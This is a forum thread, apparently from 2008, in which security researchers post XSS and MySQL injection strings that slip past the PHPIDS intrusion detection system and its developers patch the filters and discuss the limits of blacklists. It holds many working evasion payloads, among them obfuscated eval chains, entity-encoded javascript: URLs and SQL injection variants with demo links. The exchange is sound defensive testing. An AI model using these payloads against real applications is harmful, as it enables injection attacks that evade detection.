That's well right - 'twas too late yesterday evening to remember that :)

But anyway - base64 is still a big problem - unclear to solve. I will do some 'fun experiments' this evening hoping to find a way to deal with those issues. But I am sure there won't be something bulletproof against data URLs since the encoding can be chosen rather arbitrarily: http://h4k.in/dataurl

Greetings,
.mario

@mario

You seem to have protected well against data: injection, I tried MANY combinations to defeat the reg exps including mixing entities and control characters. So I guess it isn't a problem unless it can be bypassed. I would suggest making data: url's a higher impact though.

For reference I've found the data: works on Safari, Firefox and Opera.

Please continue your fun experiments :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

rsnake Wrote:
-------------------------------------------------------
> I'm by no way disparaging your work. I'm only
> saying I think this is the wrong approach.
> Blacklists have been proven to fail for 17 pages.
> Which page do we need to get to before everyone
> agrees? So far everyone is saying it can't be
> done (I agree) - and to me that is the definition
> of the wrong approach, or at minimum the least
> attractive option.
>
> I promise, I'm not trying to stir the pot here,
> I'm honestly concerned that I'm not getting why
> you guys are so gung-ho about a project that is
> unlikely to be bulletproof at serving it's primary
> function. What am I missing? Is stopping script
> kiddies enough? If so, I get it - but I thought
> there was a greater goal.

I'm happy you wrote this. Actually, you and some others are missing something here indeed.

I don't need to argue with you or any of you guys about the effectiveness of blacklist approaches. As a matter of fact, blacklists are always buggy - by design. You cannot stop anyone from injecing malicious code with them.

> about a project that is unlikely to be bulletproof at serving it's primary function.

So what is the primary function of PHPIDS? As .mario alreay mentioned, we are not trying to build a webapp shield here at all. We are just trying to detect malicious actions taken on websites. Thats all. And thats also why I (not necessarily everyone behind PHPIDS) absolutely agree with you that the last 10 or so pages somehow lost track of our primary objective.

One step back. I consider PHPIDS a very good attack detection system, not only for a few days but for 10 pages. PHPIDS accomplished it's aim the moment it required tremendously skilled javascript magicians to be "broken".

Have you ever tried breaking into something by firstly injecting:

s=/x/
$s=.1?'ev':a
$s=.0?.1: $s+'al(loc'
$s=.0?.1: $s+'ation.h'
$s=.0?.1: $s+'ash) '
s.s=''. eval
s.s($s)

... instead of something like '>"><script>alert(1)</script>? I guess not. The point is, PHPIDS will not only detect trivial fragments like '>"><script>alert(1)</script>, which is clearly an XSS attempt, but also a variety of more complicated ones. The latter of course thanks to the last 10 pages; so I'm not saying those were in vain or a waste of time.

PHPIDS is very good in what it was intended to do and it's being improved as we speak. Coming back to blacklists - in this particular case, blacklists are simply a sufficient solution to the problem we faced at the beginning. Thats it, absolutely nothing has failed ;)

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

Hey!

I just added basic detection and translation for nested base64 payload. Gareth - it's on! :)

Greetings,
.mario

@mario

I had another quick play with the IDS, it's good :D

However I'd recommend that constructors and prototypes should be blocked, because global functions can reference the current window and also create functions. Take the example below which isn't a exploit of PHPIDS but shows how to create functions through constructors.

x=print.constructor
x=x(/x=alert/[-1])
x()
x(1)

So for example IMO these should be blocked as well:-
print()
moveBy(100,100)
resizeTo(0,0)

etc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's a trick to get the current window even though it's a XPconnect object:-

x=print.__parent__
x=x['alert']
x(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Here's a new one :D

You need to click on the links though:-
ale&zwj;rt(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

ale&zwnj;rt(1)
aler&lrm;t(1)
aler&rlm;t(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Garteh: I absolutely agree and will make those changes ASAP.

&rlm; <- WTF!? Great job - thx!

:)

Greetings,
.mario

If I had time I may have been able to turn this into a working XSS hole:-

<table background=&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000006a&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000076&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000073&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000063&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000072&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000069&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000070&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000074&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000003a&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000061&#x00000000000000000000000000000000000000000000000000000000000000000000000000000000006c&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000065&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000072&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000074&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000028&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000031&#x000000000000000000000000000000000000000000000000000000000000000000000000000000000029>

Tested in Opera and the injected tag isn't detected in the IDS, possibly could work in IE but I've not tried.

Impact rating of 16,

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hmmm - I don't know if it makes sense to check on tables - since you can use a lot more elements for background injections. I'd rather propose to check for the background attribute.

Yeah agreed

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

+alert(1)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Fixx0r3d - small bug in the UTF7 converter (even if that explanation sounds weird *g*)

thanks for the tip Gareth and .mario: http://p42.us/phpids/59.html

ACM=1,1+eval(1+name+(+ACM-1),ACM)

[edit]
I mistakenly thought the above injection was due to an error in the converter dealing with utf-7. I guess not since this injection gets through as well (24 chars): http://p42.us/phpids/60.html

1+eval(1+name+(+1-1),-1)

Edited 3 time(s). Last edit at 02/17/2008 10:20PM by thornmaker.

@thornmaker

Awesome :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hehe - nice indeed! I realized that the mb_convert_encoding stuff is to handle with great care and narrowed the conditions a little bit. Plus the possible UTF7 is now being decoded and attached - not used as replacement for the whole string. Thx!

I think I will release 0.4.7 tomorrow - any pleas?

1'*column-0-'0 (php-ids)
1'*column-false-'0 (php-ids)
1'*column-0|'0 (php-ids)
1'-column!=-column-'0 (php-ids)
1'-column!=-column|'0 (php-ids)

1'-@a or'1 (php-ids)
a'-@a=@a or'1 (php-ids)

greetings :)

fun stuff Reiners!

;) yep

the above vector works with different operands of course (aa'^@a or'1 and so on)

edit:
aa'LIKE('aa')|'1 (php-ids)

edit:
aa' *@var or 1 SOUNDS LIKE (1)|'1 (php-ids)
aa' *@var or 1 RLIKE (1)|'1

edit:
a' or~column like ~1|'1 (php-ids)



Edited 7 time(s). Last edit at 02/18/2008 07:41PM by Reiners.

Hi Reiners

Nice ones... thx. Fixed!

Greetings,
.mario

workarounds for the last fixes ;). remember that MySQL syntax allows as many operands, spaces, brackets and prefixes as you want and where you want.

aa'LIKE('aa')|-'1 http://demo.php-ids.org/?test=aa'LIKE('aa')%7c-'1
a' or ~ column like ~1|(1)#a http://demo.php-ids.org/?test=a'%20or%20~%20column%20like%20~1%7c(1)%23a
aa' * @var or-1 SOUNDS LIKE (1)|-'1 http://demo.php-ids.org/?test=aa'%20*%20@var%20or-1%20SOUNDS%20LIKE%20(1)%7c-'1
aa' * @var or-(1) = -'1 http://demo.php-ids.org/?test=aa'%20*%20@var%20or-(1)%20=%20-'1
1'-@a or-(1)=-'1 http://demo.php-ids.org/?test=1'-@a%20or-(1)=-'1
a' - @a = @a or-(1)=-'1 http://demo.php-ids.org/?test=a'%20-%20@a%20=%20@a%20or-(1)=-'1

1'*column-(0)-'0 http://demo.php-ids.org/?test=1'*column-(0)-'0
1' * column - (false) - '0 http://demo.php-ids.org/?test=1'%20*%20column%20-%20(false)%20-%20'0
1'*column-0|-'0 http://demo.php-ids.org/?test=1'*column-0%7c-'0
1'-column!=-(column)-'0 http://demo.php-ids.org/?test=1'-column!=-(column)-'0
1'-column!=-column|-'0 http://demo.php-ids.org/?test=1'-column!=-column%7c-'0

(they are mainly using all the same little filter bug with a prefix infront of the last number or brackets around another operand)

MfG :)

@reiners

Very cool! :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

As interesting as this topic is, your PHPIDS is 1000% oversensitive. It detects usage of closing bold and italic tags? It raises flags over the use of a perfectly fine hyperlink or image tag, and calls it javascript injections? I thought that this was supposed to allow non-malicious code to operate, whilst filtering malicious code. Blacklisting character sets does not work. Some pretty tricky xxs injections tho Gareth :)

@fragge: PHPIDS isn't supposed to filter anything. It only detects and then assigns it a an impact value. Based on that value certain actions can be triggered.

-tx @ lowtech-labs.org

So if I pad my document with hundreds of <b><i> and </i></b>, and raise the severity warning, will my document be cancelled? I don't understand the point of this.. it doesn't allow for actual usability.. It just stops any injection.. Which there wouldn't be if we removed the form in the first place - something this thing practically does by blacklisting anything with <> or ' zzz.. using script not only pulls up the "possibly malicious html element" filter, but it also somehow brings up the obfuscation filter as well, despite the obvious fact that no obfuscation has been done. In the hands of a retarded web master, everything will be blocked and their forms will be useless. ._.

@fragge: The thing is - as tx mentioned correctly: The PHPIDS is not supposed to check on user input where the developer expects or even demands HTML - like from WYSIWYG editors or comparable. It doesn't make sense to monitor such input but just pump it through a well configured HTMLPurifier instance. You can easily exclude those fields by adding them to the include list via Config.ini or dynamically.

The PHPIDS takes care of all the rest - which I believe to be about 99% of all fired requests on a nowadays webapp. The whole system is pretty much designed for very large webapps and it performs well on those.

@Reiners: Nice circumventions ;) Will take care of them asap!

hey .mario, new workarounds of the last fixes for you:

aa'LIKE('aa')-'-1 http://demo.php-ids.org/?test=aa'LIKE('aa')-'-1
a' or ~ column like 1|-'1 http://demo.php-ids.org/?test=a'%20or%20~%20column%20like%201%7c-'1
aa' * @var -1 or 1 SOUNDS LIKE (1)|'-1 http://demo.php-ids.org/?test=aa'%20*%20@var%20-1%20or%201%20SOUNDS%20LIKE%20(1)%7c'-1
1'*+column-(0)-'-0 http://demo.php-ids.org/?test=1'*+column-(0)-'-0
1'*+column-(false)-'-0 http://demo.php-ids.org/?test=1'*%2bcolumn-(false)-'-0
1'*+column-0|-'-0 http://demo.php-ids.org/?test=1'*%2bcolumn-0%7c-'-0
1'-column!=-(column)-'-0 http://demo.php-ids.org/?test=1'-column!=-(column)-'-0
1'-column!=-column|-'-0 http://demo.php-ids.org/?test=1'-column!=-column%7c-'-0
1'-id-(@a)or-1='-1 http://demo.php-ids.org/?test=1'-id-(@a)or-1='-1
aa'*(@var)or(-1)='-1 http://demo.php-ids.org/?test=aa'*(@var)or(-1)='-1

most of them uses the trick that you can use a prefix in front of the last operand behind the last bracket plus some other prefix/brackets/spaces/operands to pass it around the filters. so its not really that much new stuff ;)

Nices ones again - kay, the "\w at the end was pretty senseless ;) Thx!

1'*(@a)or(1)LIKE'1 http://demo.php-ids.org/?test=1'*(@a)or(1)LIKE'1
1'*id LIKE(1)+'1 http://demo.php-ids.org/?test=1'*id%20LIKE(1)%2b'1
aa'*@var -1 or 1 SOUNDS LIKE(1)|'+1 http://demo.php-ids.org/?test=aa'*@var%20-1%20or%201%20SOUNDS%20LIKE(1)%7c'%2b1
1'*column+0+ ' +0 http://demo.php-ids.org/?test=1'*column%2b0%2b%20'%20%2b0
1'+column or 1 LIKE '1 http://demo.php-ids.org/?test=1'%2bcolumn%20or%201%20LIKE%20'1
1'-column!=-column%7c- ' -0 http://demo.php-ids.org/?test=1'-column!=-column%7c-%20'%20-0


most of them work with a "+" instead of a "-". The prefix actually doesnt matter, I just use to try with "-" because "+" is often used in javascript injections and I don't have to url encode it ;). maybe that was confusing. Plus I often used some spaces near the quote.